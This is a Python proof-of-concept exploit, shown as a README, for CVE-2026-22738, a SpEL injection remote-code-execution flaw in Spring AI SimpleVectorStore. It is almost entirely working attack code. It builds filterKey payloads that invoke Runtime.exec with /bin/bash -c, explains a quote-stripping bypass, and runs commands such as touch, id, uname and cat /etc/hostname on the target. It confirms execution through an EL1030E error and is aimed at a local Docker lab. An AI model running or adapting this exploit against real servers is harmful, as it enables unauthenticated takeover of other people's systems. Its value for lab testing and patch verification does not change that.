README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-22738 — SpEL Injection RCE in Spring AI SimpleVectorStore
CVSS 9.8 CRITICAL | CWE-94 / CWE-917
Affected: org.springframework.ai:spring-ai-core 1.0.0–1.0.4, 1.1.0-M1–1.1.3
Fixed: Spring AI 1.0.5 / 1.1.4 (commit ba9220b22383e430d5f801ce8e4fa01cf9e75f29)
Technique
─────────
SimpleVectorStore.similaritySearch() passes the user-supplied filter key name
verbatim into a SpEL template evaluated by StandardEvaluationContext.
StandardEvaluationContext exposes the full JVM reflection API, so injecting
T(java.lang.Runtime).getRuntime().exec(...)
into the filter key achieves unauthenticated OS command execution.
Key bypass detail (from exploit research):
• Naïve single-quote injection fails because the filter text parser treats
a key starting with ' as a quoted string and strips the outer quotes.
• Wrapping the payload in double quotes ("...") causes the parser to strip
the outer double quotes, leaving the inner content (starting/ending with ')
to be used verbatim as the SpEL key via #metadata['<KEY>'].
• Using #metadata[''] on both sides (instead of undefined foo[...]) avoids
an "unknown variable" SpEL error while still triggering exec().
Success indicator:
• HTTP response body contains "EL1030E" — the SpEL runtime error
"operator ADD not supported between null and java.lang.ProcessImpl".
This error is raised AFTER exec() returns, confirming OS-level execution.
Usage
─────
pip install requests
python3 exploit.py [--target http://localhost:8082]
For Docker Desktop (macOS/Windows) callback payloads, use host.docker.internal
instead of 127.0.0.1 as the callback IP.
"""
import argparse
import subprocess
import sys
import time
try:
import requests
except ImportError:
print("[!] Missing dependency — run: pip install requests")
sys.exit(1)
# ── Constants ──────────────────────────────────────────────────────────────────
CONTAINER_NAME = "cve-2026-22738-lab" # must match docker-compose container_name
PROOF_FILE = "/tmp/pwned_cve_2026_22738"
RCE_PROOF_FILE = "/tmp/rce_proof.txt"
# SpEL error raised after exec() returns — reliable OOB-free confirmation of RCE
RCE_INDICATOR = "EL1030E"
BANNER = """
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2026-22738 — Spring AI SpEL Injection → RCE ║
║ CVSS 9.8 CRITICAL | No Auth | No Interaction ║
║ Affected: Spring AI SimpleVectorStore 1.0.0–1.0.4 ║
╚══════════════════════════════════════════════════════════════════╝"""
# ── Payload helpers ────────────────────────────────────────────────────────────
def spel_filter_key(cmd: str) -> str:
"""
Build the SpEL injection filterKey parameter value.
The application concatenates filterKey into the filter expression string:
filterExpr = filterKey + " == '" + filterValue + "'"
With our payload the expression becomes:
"'] + T(java.lang.Runtime).getRuntime().exec(new String[]{...}) + #metadata['" == 'x'
The filter text parser strips the outer double-quotes and passes the inner
content to doKey(), which embeds it into:
#metadata[''] + T(java.lang.Runtime)...exec(...) + #metadata[''] == 'x'
StandardEvaluationContext evaluates this, exec() fires, then SpEL throws
EL1030E (can't ADD null + ProcessImpl) — that error is our success indicator.
IMPORTANT: cmd must not contain single quotes (they would break the SpEL string).
For commands with single-quoted arguments, base64-encode and decode inline.
"""
return (
f'''"'] + T(java.lang.Runtime).getRuntime().exec('''
f'''new String[]{{'/bin/bash','-c','{cmd}'}}) + #metadata['"'''
)
def spel_read_property(prop: str) -> str:
"""Blind probe payload — reads a JVM system property (no OS exec needed)."""
return f'''"'] + T(java.lang.System).getProperty('{prop}') + #metadata['"'''
# ── Individual exploit steps ───────────────────────────────────────────────────
def step_baseline(session: requests.Session, target: str) -> bool:
"""Step 1 — confirm the endpoint is reachable and the seeded document is returned."""
print("\n[*] Step 1 — Baseline check (filterKey=country, filterValue=US)")
try:
resp = session.get(
f"{target}/search",
params={"filterKey": "country", "filterValue": "US", "query": "hello"},
timeout=15,
)
except requests.ConnectionError as e:
print(f" ✗ Connection refused: {e}")
return False
if resp.status_code == 200 and ("country" in resp.text or "US" in resp.text or "Hello" in resp.text):
print(f" ✓ Endpoint reachable — seeded document returned (HTTP {resp.status_code})")
return True
print(f" ✗ Unexpected response (HTTP {resp.status_code}): {resp.text[:300]}")
return False
def step_spel_probe(session: requests.Session, target: str) -> bool:
"""Step 2 — blind SpEL probe to confirm the injection point is reached."""
print("\n[*] Step 2 — SpEL probe (read java.version via T(java.lang.System))")
payload = spel_read_property("java.version")
resp = session.get(
f"{target}/search",
params={"filterKey": payload, "filterValue": "x", "query": "hello"},
timeout=15,
)
# SpEL evaluation error (500) or clean response (200) — both confirm evaluation happened
if resp.status_code in (200, 500):
print(f" ✓ SpEL expression reached the evaluator (HTTP {resp.status_code})")
if "21" in resp.text or "17" in resp.text or "java" in resp.text.lower():
print(f" ✓ Java version string visible in response body")
return True
print(f" ? Unexpected status {resp.status_code}: {resp.text[:200]}")
return False
def step_rce_touch(session: requests.Session, target: str) -> bool:
"""Step 3 — RCE: create /tmp/pwned_cve_2026_22738 inside the container."""
print(f"\n[*] Step 3 — RCE: touch {PROOF_FILE}")
cmd = f"touch {PROOF_FILE}"
resp = session.get(
f"{target}/search",
params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
timeout=15,
)
if RCE_INDICATOR in resp.text:
print(f" ✓ {RCE_INDICATOR} in response — Runtime.exec() was invoked (process spawned)")
return True
print(f" ? Response (HTTP {resp.status_code}): {resp.text[:300]}")
# Still return True if we get a 500 with any error — execution may have happened
return resp.status_code == 500
def step_rce_id(session: requests.Session, target: str) -> bool:
"""Step 4 — RCE: write id/uname/hostname to /tmp/rce_proof.txt."""
print(f"\n[*] Step 4 — RCE: capture id + uname + hostname → {RCE_PROOF_FILE}")
# Chained commands — must not use single quotes inside the payload
cmd = (
f"id > {RCE_PROOF_FILE} && "
f"uname -a >> {RCE_PROOF_FILE} && "
f"cat /etc/hostname >> {RCE_PROOF_FILE}"
)
resp = session.get(
f"{target}/search",
params={"filterKey": spel_filter_key(cmd), "filterValue": "x", "query": "hello"},
timeout=15,
)
if RCE_INDICATOR in resp.text:
print(f" ✓ {RCE_INDICATOR} detected — command dispatched")
return True
print(f" ? HTTP {resp.status_code}: {resp.text[:200]}")
return False
def step_verify_docker() -> bool:
"""Step 5 — read proof files from inside the container via docker exec."""
print("\n[*] Step 5 — Verifying via docker exec")
time.sleep(1) # give the spawned bash process a moment to finish writing
# ── Check the touch file ──────────────────────────────────────────────────
try:
r = subprocess.run(
["docker", "exec", CONTAINER_NAME, "ls", "-la", PROOF_FILE],
capture_output=True, text=True, timeout=10,
)
if r.returncode == 0:
print(f" ✓ Proof file present: {r.stdout.strip()}")
else:
print(f" ✗ Proof file missing: {r.stderr.strip()}")
except FileNotFoundError:
print(" ! 'docker' binary not in PATH — skipping file check")
return False
except subprocess.TimeoutExpired:
print(" ! docker exec timed out")
return False
# ── Read id / uname output ────────────────────────────────────────────────
try:
r = subprocess.run(
["docker", "exec", CONTAINER_NAME, "cat", RCE_PROOF_FILE],
capture_output=True, text=True, timeout=10,
)
if r.returncode == 0 and r.stdout.strip():
print(f"\n{'='*62}")
print(" RCE PROOF (executed inside the container):")
print(f"{'='*62}")
for line in r.stdout.strip().splitlines():
print(f" {line}")
print(f"{'='*62}")
return "uid=" in r.stdout
else:
print(f" ✗ Could not read {RCE_PROOF_FILE}: {r.stderr.strip()}")
return False
except subprocess.TimeoutExpired:
print(" ! docker exec timed out while reading proof file")
return False
# ── Main ───────────────────────────────────────────────────────────────────────
def wait_for_ready(target: str, timeout_s: int = 120) -> bool:
"""Poll /search?filterKey=country&filterValue=US until the app responds (or timeout)."""
deadline = time.time() + timeout_s
print(f"[*] Waiting for app to be ready at {target} (up to {timeout_s}s) …", end="", flush=True)
while time.time() < deadline:
try:
r = requests.get(
f"{target}/search",
params={"filterKey": "country", "filterValue": "US"},
timeout=5,
)
if r.status_code in (200, 500):
print(" ready!")
return True
except Exception:
pass
print(".", end="", flush=True)
time.sleep(3)
print(" TIMEOUT")
return False
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-22738 PoC — SpEL RCE in Spring AI SimpleVectorStore"
)
parser.add_argument(
"--target",
default="http://localhost:8082",
help="Base URL of the vulnerable app (default: http://localhost:8082). "
"Inside Docker use http://host.docker.internal:8082",
)
parser.add_argument(
"--wait", action="store_true",
help="Poll the target until it is ready before exploiting (useful right after 'docker compose up')",
)
args = parser.parse_args()
target = args.target.rstrip("/")
print(BANNER)
print(f"Target: {target}\n")
session = requests.Session()
if args.wait:
if not wait_for_ready(target):
print("[!] Target never became ready. Exiting.")
sys.exit(1)
# ── Run steps ─────────────────────────────────────────────────────────────
if not step_baseline(session, target):
print("\n[!] Baseline failed — is the container running?")
print(f" Try: docker compose up -d --build (then retry with --wait)")
sys.exit(1)
step_spel_probe(session, target)
rce_ok = step_rce_touch(session, target)
step_rce_id(session, target)
verified = step_verify_docker()
# ── Final verdict ─────────────────────────────────────────────────────────
print()
if rce_ok and verified:
print("✅ EXPLOIT SUCCEEDED — full unauthenticated RCE confirmed (running as root)")
elif rce_ok:
print("⚠️ EXPLOIT LIKELY SUCCEEDED — EL1030E received but docker verify was skipped")
print(f" Manual check: docker exec {CONTAINER_NAME} cat {RCE_PROOF_FILE}")
else:
print("❌ EXPLOIT FAILED — check that the target is running Spring AI 1.0.0–1.0.4")
if __name__ == "__main__":
main()